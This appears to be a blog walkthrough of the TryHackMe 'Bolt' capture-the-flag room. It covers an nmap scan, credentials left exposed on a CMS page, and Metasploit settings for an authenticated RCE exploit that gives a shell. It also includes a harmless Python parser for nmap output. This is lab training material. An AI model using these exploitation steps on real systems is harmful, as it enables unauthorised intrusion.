The skills tested in this room are RCE, Metasploit, and just a keen eye.
This room was released today, 8/12/2020, and I wanted to see if I could crack it. This is a super easy room, perfect for anyone who wants to try CTFs or hacking.
I also chose to mask part of the answers so you will have to do the steps and see how things work. I don’t want to take away this learning experience from you.
Shoutout to @0x9747 for creating the room. You can access the room at https://tryhackme.com/room/bolt
I was assigned an IP address of 10.10.40.194
There are 8 tasks to complete the room:
- What port number has the web server with a CMS running?
- What is the username we can find in the CMS?
- What is the password we can find for the username?
- What version of the CMS is installed on the server?
  - B*** *.*.*
- There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What is its EDB-ID?
- Metasploit recently added an exploit module for this vulnerability. What’s the full path for this exploit?
- Set the LHOST, LPORT, RHOSTS, USERNAME, PASSWORD in msfconsole
  - No answer needed
- Look for the flag.txt inside the machine
1. Deploy the machine
2. Scan the victim machine for any open ports and services using nmap: nmap -sC -sV -oA Desktop/TryHackMe/Bolt 10.10.40.194
- -sC – scan using the default nmap scripts
- -sV – pull version information for the open ports found during the scan
- -oA Desktop/TryHackMe/Bolt – save the results of the scan under the base name Bolt in three different formats (normal, XML, and grepable)
- There are 3 open ports; let’s check port 80 and port 8*** in turn
- There is nothing too interesting on the page on port 80; it is just the default Apache welcome page.
- However, port 8*** is running Bolt CMS
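The -oA option above writes the scan in three formats, one of which is the grepable .gnmap file. As an added example that is not from the original walkthrough, the following parser reads that format and lists the open HTTP-like services that deserve a browser visit, the same triage that found the CMS on a non-standard port; the scan output in the sample is constructed and is not the room's.

```python
"""Parse Nmap grepable (.gnmap) output, one of the three files -oA writes.
Added example, not from the original post; the sample is constructed, not the room's scan."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample (TEST-NET address, made-up banners and ports), not real room output.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Wed Aug 12 10:00:00 2020 as: nmap -sC -sV -oA Desktop/TryHackMe/Bolt 192.0.2.10
Host: 192.0.2.10 ()\tStatus: Up
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/, 8888/open/tcp//http//Example PHP app server/, 25/filtered/tcp//smtp///\tIgnored State: closed (996)
# Nmap done at Wed Aug 12 10:01:00 2020 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""

@dataclass(frozen=True)
class PortRecord:
    host: str
    port: int
    state: str
    proto: str
    service: str
    version: str

def parse_gnmap(text: str) -> list[PortRecord]:
    """Return one PortRecord per entry on each 'Host: ... Ports:' line."""
    records = []
    for line in text.splitlines():
        # Status: lines and '#' comments carry no per-port data; skip them.
        if not line.startswith("Host:") or "\tPorts: " not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        # Split only where the next port number begins, so commas inside banners survive.
        for entry in re.split(r", (?=\d+/)", ports_field):
            fields = entry.split("/")  # port/state/protocol/owner/service/rpc info/version/
            if len(fields) < 7:
                continue
            records.append(PortRecord(host, int(fields[0]), fields[1], fields[2],
                                      fields[4], fields[6]))
    return records

def open_web_ports(records: list[PortRecord]) -> list[int]:
    """Open HTTP-like ports: the ones worth a browser visit, as in step 2."""
    return sorted(r.port for r in records if r.state == "open" and r.service.startswith("http"))

if __name__ == "__main__":
    recs = parse_gnmap(SAMPLE_GNMAP)
    print("web ports to inspect:", open_web_ports(recs))  # [80, 8888]
```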
3. Let’s look around the different pages and links and check whether there is any useful information we can use against this web server. The following 2 screenshots contain the information needed to exploit the CMS.
- I don’t know about you guys, but this Jake, the admin, needs to be fired ASAP. I mean, who in their right mind would post their username and password on a publicly accessible page??? Good thing this is just for practice and for fun, lol.
4. Browse to https://www.exploit-db.com and search for bolt in the search field.
5. Open Metasploit. msfconsole
6. Type search bolt to look for the Metasploit module that we can use to exploit the machine.
7. Type use 1 to load the second module (module numbering starts at 0), and type show options to check which parameters/settings need to be set.
8. Set up the following:
- set RHOSTS 10.10.40.194 – this is to set up the target machine using its IP address
- set LHOST 10.2.*.* – this is your attack machine’s IP address
- set USERNAME b*** – the username we found on the webpage
- set PASSWORD b**********3 – the password posted on the webpage
9. Type exploit or run to start the exploit against the CMS running on the target machine.
- Above, we can see that we are inside the /home/bolt/public/files directory
10. Look for flag.txt. The flag is in the /home directory
Hope you enjoyed the walk-through. Please share and subscribe to my blog! Mahalos!